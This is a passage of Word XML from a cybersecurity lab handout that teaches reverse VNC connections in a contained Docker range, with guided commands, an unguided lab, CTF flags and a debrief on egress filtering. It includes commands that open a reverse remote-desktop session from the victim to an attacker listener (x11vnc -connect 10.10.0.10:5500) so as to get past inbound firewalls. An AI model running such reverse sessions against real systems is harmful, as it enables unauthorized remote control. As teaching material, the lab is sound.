          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>6. Lab Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D160EEF" w14:textId="77777777" w:rsidR="00EA5F74"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3247DCB0" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:t>6A — Guided Lab (follow along, then practice)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EA1B11" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Work through these steps on the attacker; the commands are given. Read each “Expected” line to confirm you are on track, then complete the Practice task on your own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D0775" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>1. On the victim, start a VNC server. (Range note: install tightvncserver/x11vnc on the victim if absent.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3FAC1" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker exec -it metasploitable vncserver :2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A7A37F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker exec -it metasploitable vncserver -list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E37E978" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: a server on display :2 (port 5902).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4204927C" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>2. From the RDP desktop, connect the normal (forward) way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44747C7C" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vncviewer 10.30.0.20:5902</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D867EE" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the victim's desktop — this is what an inbound firewall would block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6017E8DB" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>3. Stop that server; start a listening viewer on the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104CF9C5" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vncviewer -listen 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416B6BB" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the attacker waiting for an incoming connection (port 5500).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266D1EAB" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>4. From the victim, dial out to the attacker's listener (reverse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433E4DD4" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1B3A33"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>docker exec -it metasploitable x11vnc -connect 10.10.0.10:5500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C9156" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the session appearing on the attacker — the victim called out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0697B" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>5. Confirm the reverse session is live.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB7A55" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:ind w:left="432"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>→ Expected: the victim's screen on your listening viewer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6491093C" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t xml:space="preserve">Practice: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Explain why the reverse connection succeeds where the forward one would be blocked, and name the control that detects it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C3464" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:t>6B — Unguided Lab (objectives + hints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7412A1E3" w14:textId="77777777" w:rsidR="00EA5F74"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09D97F33" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>1. Range note: the victim container needs a VNC server and x11vnc; if they are not already installed, add tightvncserver and x11vnc to the victim image first. All steps stay inside br-dmz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F1730F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. On the victim host (docker exec -it metasploitable bash, become root), start a VNC server on a display (for example, :2) and list the running servers to confirm the port it opened (5900 + display number).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D7F4BF" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>3. On the attacker container, launch a VNC viewer and connect to the victim server on that display's port, authenticating when prompted, to confirm normal remote control works within the range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD5053F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>4. Reason about the firewall: if the victim were behind an inbound-blocking firewall, this forward connection would fail. Note why.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66373520" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>5. Stop the victim VNC server for the display you started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFDF466" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>6. On the attacker, start the VNC viewer in listen mode so it waits for an incoming (reverse) connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F95DCDA" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>7. On the victim, initiate an outbound reverse connection back to the attacker's listener (x11vnc's -connect option pointing at the attacker address 10.10.0.10 and the listener port).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53464AF8" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>8. On the attacker, confirm the reverse session appears — the victim inside connected out to you — and write down why inbound firewall rules never saw it coming.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F74" w14:paraId="09D851C6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEE7F1"/>
          </w:tcPr>
          <w:p w14:paraId="4AB6F9A3" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>Hints (not full answers)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6893D17B" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A VNC display maps to a port: display :2 listens on 5902. vncserver -list shows what's running. Forward: vncviewer &lt;host&gt;:&lt;port&gt;. The viewer must be able to reach the server — that's what an inbound firewall blocks. Reverse: start the viewer with vncviewer -listen 0, then have the inside host connect out to it. From the victim, x11vnc -connect 10.10.0.10:5500 dials the waiting viewer — the connection originates inside. The firewall inspects who initiates the connection, not what it carries — an outbound-initiated session looks like ordinary egress.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AC5D698" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="180" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
        </w:rPr>
        <w:t>6C — Capture the Flag (no instructions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C671DE" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Contrast forward and reverse remote access. Get an interactive session the inbound firewall wouldn't allow.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3180"/>
        <w:gridCol w:w="3180"/>
        <w:gridCol w:w="3180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F74" w14:paraId="259A1CA4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="320B13A9" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="6DFE1535" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Pts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="478071CA" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Capture this</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="73EE5B7B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24497348" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30D8515F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75B67689" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The TCP port that display :2 listens on.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="1639B06C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A386550" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009369A2" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32482ED7" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Which connection direction a default firewall permits, and why.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F74" w14:paraId="452E4677" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E31D4B2" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Flag 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18B98E5D" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="219751EA" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The egress control a defender should add.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B520F83" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Total: 40 points. Submit each flag's value with one screenshot showing how you captured it. Any tool or method is allowed — but every target stays inside the 10.30.0.0/24 range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3629C49F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00EA5F74">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B68CBCB" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Debrief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5F283F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Forward and reverse are the whole lesson. A forward connection asks the firewall to let a stranger in, and a decent firewall says no. A reverse connection has the inside machine place the call, and to the firewall that's just an employee's computer reaching out — indistinguishable, at the packet level, from normal browsing. This is why nearly every real backdoor is outbound-initiated, and why defense shifts to egress filtering, application allow-listing, and watching for unexpected outbound sessions rather than trusting the inbound wall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239802AF" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7. Deliverable: Screenshots &amp; Brief Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ABA88D" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Submit the following as a single PDF or document, in order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696DECCE" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of the victim VNC server running (with its port) and the forward vncviewer session from the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392294E5" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>• Screenshot of the attacker viewer in listen mode waiting for a reverse connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB6EAE8" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Screenshot of the established reverse VNC session on the attacker, initiated from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5EBEB1" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• A brief report contrasting the forward and reverse connections and recommending the egress controls a defender should add.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC6623F" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Terminal Activity Log: on the attacker container, run  history 10 &gt; lab16.txt , then last -n 10 &gt;&gt; lab16.txt , then  cat lab16.txt  — screenshot the output of that final cat command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B3CB79" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>8. Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491D0D3" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Up to five curated resources for this lab, including video walkthroughs where useful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79050FC2" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• TightVNC documentation (official)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A6EE6" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• x11vnc manual (official)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD5D46" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• MITRE ATT&amp;CK — Remote Services: VNC (T1021.005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B0199A" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• MITRE ATT&amp;CK — Command and Control (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D2F441" w14:textId="77777777" w:rsidR="00EA5F74" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• [Video] Reverse Connections &amp; Firewall Evasion (conceptual)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F74" w14:paraId="7B4F8A30" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
